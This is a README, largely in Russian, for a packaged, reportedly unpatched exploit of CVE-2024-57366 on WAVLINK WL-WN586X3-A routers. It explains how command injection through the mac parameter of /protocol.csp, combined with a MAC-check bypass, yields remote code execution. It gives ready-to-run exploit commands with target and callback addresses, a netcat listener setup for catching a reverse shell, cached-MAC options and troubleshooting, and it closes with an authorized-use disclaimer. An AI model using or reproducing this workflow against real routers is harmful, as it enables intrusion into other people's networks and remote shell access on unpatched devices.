
Productized exploit for CVE-2024-57366 on WAVLINK WL-WN586X3-A routers (UNPATCHED AS OF THIS RELEASE!)
Надёжный эксплойт для CVE-2024-57366, позволяющий удалённо выполнять код на уязвимых маршрутизаторах через обход проверки MAC-адреса и внедрение команд.
Это эксплойт после авторизации, требующий включённой функции «Удалённое управление» на маршрутизаторе и пароля администратора. Имя пользователя администратора жёстко задано как «admin».
sudo (требуется для управления сетевыми интерфейсами)pip3 install requests
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# Скрипт спросит: "Use cached MAC for quick exploit? (y/n):" — ответьте "y"
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123 --force-full
python3 exploit.py --list-cached
--target — IP-адрес целевого маршрутизатора (по умолчанию: 127.0.0.1)--port — Порт целевого маршрутизатора (по умолчанию: 80)--local-ip — Ваш локальный IP-адрес для обратного вызова reverse shell--local-port — Локальный порт для обратного вызова reverse shell (по умолчанию: 4444)--password — Пароль администратора маршрутизатора--ssid — Имя сети WiFi (по умолчанию: WAVLINK-Mesh_DC4B)--force-full — Принудительно выполнить полный эксплойт, пропуская проверку кэшированного MAC--list-cached — Показать список кэшированных MAC-адресов и выйтиCVE-2024-57366 эксплуатирует обход проверки MAC-адреса в прошивке маршрутизатора. Уязвимость позволяет внедрять команды через параметр mac в конечной точке /protocol.csp.
eth0 для сохранения исходного сетевого контекстаindex=1, токен в пути URL)Эксплойт автоматически кэширует успешные MAC-адреса в файл successful_macs.txt:
# CVE-2024-57366 Successful MAC Addresses
# Format: MAC_ADDRESS TARGET_IP TIMESTAMP
# You can manually add entries here
32:98:A2:A8:5F:5F 192.168.1.187 1758305048.0 # 2025-09-19 14:44:08
Ручное добавление MAC: Отредактируйте successful_macs.txt и добавьте строки вида:
AA:BB:CC:DD:EE:FF 192.168.1.100 1758305048.0 # 2025-09-19 14:44:08
# Запустите слушатель netcat
nc -lvp 4444
# Запустите эксплойт
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# Когда появится запрос на сохранение MAC-адреса, ответьте "y"
# Запустите слушатель netcat
nc -lvp 4444
# Запустите эксплойт (будет использован кэшированный MAC)
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# Ответьте "y", когда спросят об использовании кэшированного MAC
«No wireless adapters found»
sudo«MAC address validation failed»
«Request timed out»
«Reverse shell not connecting»
--local-ip (используйте ip addr show eth0)CVE-2024-57366/
├── exploit.py # Основной скрипт эксплойта
├── successful_macs.txt # Кэш MAC-адресов (автоматически создаваемый)
└── README.md # Этот файл
Этот инструмент предназначен только для образовательного и авторизованного тестирования. Используйте только на системах, которыми вы владеете или на тестирование которых имеете явное разрешение. Авторы не несут ответственности за любое неправомерное использование этого инструмента.
/protocol.cspЭтот проект предоставляется «как есть» в образовательных целях. Используйте ответственно и в соответствии с действующим законодательством.